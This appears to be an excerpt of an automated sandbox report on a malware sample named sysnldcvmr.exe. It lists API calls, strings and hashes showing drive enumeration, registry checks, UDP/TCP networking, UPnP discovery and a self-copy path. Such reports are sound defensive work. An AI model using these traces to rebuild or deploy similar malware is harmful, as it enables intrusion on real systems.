                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    • API String ID: 2743515581-2960703779
                                                                                                                                                                                                                                                    • Opcode ID: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                                                                                                                                                                                                    • Instruction ID: 45b81d3650d60dd7d70083547d95fe89803667d47bfd0af2cf5eef3cde06382e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4021E774A40308BBEB11DB94CC49FEEB775BB48705F1085A9FA11AA2C0C7B96A40CB55
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                                                                                                                                    • String ID: %s%s
                                                                                                                                                                                                                                                    • API String ID: 1447977647-3252725368
                                                                                                                                                                                                                                                    • Opcode ID: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                                                                                                                                                                                                    • Instruction ID: 516f793b53608c34cc4cf2fa152c24c34b7f811ac1bf05daad4eae6c0a67dd49
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB31FAB0D00218ABCB50DFA9D8887DDBBB4FB08305F1085AAE519B6291D7795AC4CF5A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                                                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
                                                                                                                                                                                                                                                    • NoDrives, xrefs: 00406418
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                                                                                                                                                    • Opcode ID: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                                                                                                                                                                                                    • Instruction ID: 69498c8574f0fe75ee0e18bc350880e9ca7d597cc08e8ba402afd13981da7d97
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC11DD71E4020A9BDB10CFD4D946BEEBBB4FB08708F118159E911B7280D7B85695CF99
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                                                                                                                                                                                                      • Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                                                                                                                                                                                                      • Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2251373460-0
                                                                                                                                                                                                                                                    • Opcode ID: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                                                                                                                                                                                                    • Instruction ID: b4a3372add05cffca1b77c7dac60b50b4844df58a08520f3d20c10534500f2db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B31D6B4A00209EFDB04DF98D889F9EBBB5FB48304F1081A8E905A7391D775EA95CF54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 00401281
                                                                                                                                                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                                                                                    • String ID: pdu
                                                                                                                                                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                                                                                                                                                    • Opcode ID: 5b264580e174f85d4cce86815f8b38fbca65b529ae4d3d4b8a529887849fd544
                                                                                                                                                                                                                                                    • Instruction ID: d4e165de5104959f260b85937ca272364f863e3dc64df769d8e1baf9f078371f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b264580e174f85d4cce86815f8b38fbca65b529ae4d3d4b8a529887849fd544
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5831A5762083009BC710DF69D884A9BBBE4AFC9714F04456EFD9897381D634D919C7E7
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(C:\Windows\sysnldcvmr.exe), ref: 00406FF3
                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00407018
                                                                                                                                                                                                                                                      • Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407012
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • C:\Windows\sysnldcvmr.exe, xrefs: 00406FEE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                                                                                    • String ID: C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                    • API String ID: 459949847-3906355863
                                                                                                                                                                                                                                                    • Opcode ID: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                                                                                                                                                                                                    • Instruction ID: 74c6c169e6652ce6f6b7715e91ddbb7e77275cafe0f94b55a583b47f3cb3299b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13E01275D44208FBD704AFA0DD0EB9D77789B05341F1081A5F905922A0DAF95E80DB56
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                                                                                                                                                                                                    • QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
                                                                                                                                                                                                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                                                                                                                                                    • String ID: \??\
                                                                                                                                                                                                                                                    • API String ID: 1681518211-3047946824
                                                                                                                                                                                                                                                    • Opcode ID: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                                                                                                                                                                                                    • Instruction ID: affcc5b958b6168f9f245bae438771e9e0bc574488939cd978d138ae5b874539
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4101ECB0A4020CEBCB20DF55DD496DEB7B5AB04704F01C0BAAA09A7280D6759AD5CF99
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 1378416451-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                                                                                    • Instruction ID: 089911091b4f8663884f4f3f40455582f6b765449e30803f2281244f10637e16
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDF0C074A40308FBEB20DFA4DC49FDDBB78EB04711F208695FA05BB2D0D6B56A918B54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                                                                                                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3980219359-0
                                                                                                                                                                                                                                                    • Opcode ID: c9913038924388fd53f7caad2d83427ef97aeb746a7412440f965ee31c5f62a1
                                                                                                                                                                                                                                                    • Instruction ID: e1641215121ef27e00d374ead4771de002ae7678dd3977a0c2b5eb1dd4af8410
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9913038924388fd53f7caad2d83427ef97aeb746a7412440f965ee31c5f62a1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE21B1B11043016FD304DF65D884A6BB7E8AF88318F004A3EF559A6291E774D948C7AA
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFreeInstanceString
                                                                                                                                                                                                                                                    • String ID: Microsoft Corporation
                                                                                                                                                                                                                                                    • API String ID: 586785272-3838278685
                                                                                                                                                                                                                                                    • Opcode ID: 02533b8cefa12045522b44547180ad822de7a0bc47ea34b05886565fcfb19160
                                                                                                                                                                                                                                                    • Instruction ID: 457fc6c08a50d419230b37d5b6ce52bdab008108e04107557a49afcd29d8ec7c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02533b8cefa12045522b44547180ad822de7a0bc47ea34b05886565fcfb19160
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4491FC75E0410ADFCB04DB94D890AAFB7B5BF48304F2081A9E515B73E4D734AE82CB66
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002,?,?,?,00407A25), ref: 0040D64A
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                                                                                                                                                                                                      • Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                                                                                                                                                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                                                                                                                                                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                                                                                    • String ID: TCP$UDP
                                                                                                                                                                                                                                                    • API String ID: 1519345861-1097902612
                                                                                                                                                                                                                                                    • Opcode ID: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                                                                                                                                                                                                    • Instruction ID: b9d850b43d5b9198a526a111fa4c70c7537d99c61ef063864e94ee7d89292dcb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A91181B4D01208EBDB00EBD4D945FEE7374AB44308F1089BAE505772C2D7799E58CB9A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CADC
                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(000000FF), ref: 0040CB11
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(000000FF), ref: 0040CC14
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Interlocked$DecrementExchangeIncrement
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2813130747-0
                                                                                                                                                                                                                                                    • Opcode ID: 583b2f640be86316a3766e4c7421dc12573213a2e397918099c48a18d3c3b376
                                                                                                                                                                                                                                                    • Instruction ID: 83670a342839083162ad58e3b7d5d9bbd8ac0fe46ad26882e5e5984df89c7db9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 583b2f640be86316a3766e4c7421dc12573213a2e397918099c48a18d3c3b376
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB41C5B5E00204FBDF00EB94E885BAF77755B04304F148669F505BB2C2D639E94187A9
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Twizt,0040D5B8,0040D5B8,?,?,0040D5B8,00000000,0040D5B8,0040D5B8,00000000,00000000), ref: 0040B4CC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                                                                                                    • String ID: Twizt$Twizt
                                                                                                                                                                                                                                                    • API String ID: 1659193697-16428492
                                                                                                                                                                                                                                                    • Opcode ID: 28cc8b85fbb863a96b5461235214a5ab15b9d829432cc0cf808d74acbef9bc59
                                                                                                                                                                                                                                                    • Instruction ID: a71c0bccabe8f3fb080a23dd90b4eb14de59e01fcd2b7b8bcad4b0800539831b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28cc8b85fbb863a96b5461235214a5ab15b9d829432cc0cf808d74acbef9bc59
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 181124B5900108BFCB04DF98D841E9EB7B5EF48308F14C1A9FD19AB342D635EA10CBA5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 0040CDD3
                                                                                                                                                                                                                                                    • htons.WS2_32(00009E34), ref: 0040CE05
                                                                                                                                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040CE1F
                                                                                                                                                                                                                                                      • Part of subcall function 0040AB40: shutdown.WS2_32(0040AB2D,00000002), ref: 0040AB49
                                                                                                                                                                                                                                                      • Part of subcall function 0040AB40: closesocket.WS2_32(0040AB2D), ref: 0040AB53
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
